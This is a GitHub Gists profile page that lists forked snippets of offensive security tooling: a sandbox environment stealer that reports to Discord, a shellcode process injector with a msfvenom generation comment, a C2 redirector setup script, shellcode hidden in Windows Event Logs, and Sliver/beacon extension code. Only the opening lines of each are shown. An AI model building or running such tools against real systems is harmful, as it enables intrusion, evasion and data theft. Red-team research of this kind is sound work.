Skip to content

Instantly share code, notes, and snippets.

View benheise's full-sized avatar

Benjamin Heise benheise

134 followers · 173 following
View GitHub Profile
@benheise
benheise / sandbox-env-stealer.py
Created February 16, 2022 14:45 — forked from Albocoder/sandbox-env-stealer.py
The python code used to take the environment data from sandboxes and send them to discord server.
#################################################################################
# #
# Refer to this blog post about what this code is used for: #
# https://albocoder.github.io/malware/2021/06/01/SandboxStudy.html #
# #
#################################################################################
import requests
import os
import psutil
@benheise
benheise / Shellcode-Process-Injector.c
Created February 21, 2022 23:07 — forked from mhaskar/Shellcode-Process-Injector.c
#include <windows.h>
#include <sys/types.h>
#include <unistd.h>
int main(int argc, char **argv){
//msfvenom -p windows/exec cmd=calc.exe EXITFUNC=thread -f c -v shellcode
@benheise
benheise / Automated-Redirectors.py
Created February 21, 2022 23:08 — forked from mhaskar/Automated-Redirectors.py
Python script to create HTTPS redirectors that pointing to your C2
#!/usr/bin/python
import requests
import json
import time
import paramiko
from Crypto.PublicKey import RSA
from os import chmod
public_key_name = "test1.key"
@benheise
benheise / EventLogInject.cs
Created May 9, 2022 17:56
POC to inject and extract shellcode from Windows Event Logs
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading.Tasks;
namespace HiddenEventLogs
{
@benheise
benheise / COFF_With_Exception_handler.c
Created February 16, 2023 16:54 — forked from freefirex/COFF_With_Exception_handler.c
#define _WIN32_WINNT 0x0502
#define WINVER 0x0502
#include <windows.h>
#include <errhandlingapi.h>
#include <process.h>
#include "beacon.h"
WINBASEAPI PVOID WINAPI KERNEL32$AddVectoredExceptionHandler (ULONG First, PVECTORED_EXCEPTION_HANDLER Handler);
DECLSPEC_IMPORT uintptr_t __cdecl MSVCRT$_beginthreadex(void *_Security,unsigned _StackSize,_beginthreadex_proc_type _StartAddress,void *_ArgList,unsigned _InitFlag,unsigned *_ThrdAddr);
DECLSPEC_IMPORT void __cdecl MSVCRT$_endthreadex(unsigned _Retval);
@benheise
benheise / gist:b4d0c25f5c557a9cabea99006ffba2aa
Created February 16, 2023 16:55 — forked from freefirex/gist:dec308e1d95c6ea090c61d31a4db6f89
vscode user snippet for sliver coff extensions
{
"SliverExtension" :{
"prefix": "sliverext",
"body": [ "{",
"\"name\": \"$1\",",
"\"version\": \"0.0.0\",",
"\"command_name\": \"$2\",",
"\"extension_author\": \"$3\",",
"\"original_author\": \"$3\",",
"\"repo_url\": \"N/A\",",